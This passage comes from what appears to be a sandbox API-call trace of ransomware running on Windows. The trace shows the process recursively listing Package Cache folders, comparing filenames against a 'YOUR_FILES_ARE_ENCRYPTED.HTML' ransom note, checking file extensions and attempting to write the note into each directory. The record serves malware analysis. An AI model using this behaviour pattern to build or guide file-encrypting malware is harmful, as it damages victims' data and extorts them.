Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 150 [0170.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.144] GetProcessHeap () returned 0x270000 [0170.145] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.145] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc668400, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.145] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.145] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.145] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc668400, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc668400, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.145] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.145] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.145] GetProcessHeap () returned 0x270000 [0170.146] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.146] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc68e560, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.146] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.146] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.146] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc68e560, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.147] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.147] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.147] GetProcessHeap () returned 0x270000 [0170.148] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.148] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc726ae0, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0170.148] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 86 [0170.148] GetProcessHeap () returned 0x270000 [0170.148] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.148] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0170.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*" [0170.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 
0x42f3180 [0170.148] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.148] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.148] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 95 [0170.148] GetProcessHeap () returned 0x270000 [0170.148] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.148] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0170.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*" [0170.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.149] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.149] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc6b46c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.149] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 116 [0170.149] GetProcessHeap () returned 0x270000 [0170.149] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.149] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0170.149] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*" [0170.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc6b46c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.149] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, 
ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc6b46c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.149] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B", cAlternateFileName="CAB1CA~1.663")) returned 1 [0170.149] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B") returned 190 [0170.150] lstrcmpW (lpString1="cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.150] PathFindExtensionW (pszPath="cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B") returned=".66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B" [0170.150] lstrlenW (lpString=".66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B") returned 65 [0170.150] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, 
ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.150] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 142 [0170.150] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.150] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.150] lstrlenW (lpString=".msi") returned 4 [0170.150] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.150] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6b46c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.150] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0170.150] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.150] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6b46c0, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.150] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.150] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0170.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.150] GetProcessHeap () returned 0x270000 [0170.151] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.151] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc700980, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.151] wnsprintfW (in: pszDest=0x73e0048, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.151] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.151] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc700980, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.151] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.152] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.152] GetProcessHeap () returned 0x270000 [0170.152] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.152] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc726ae0, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.153] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.153] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.153] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc726ae0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.153] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.153] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
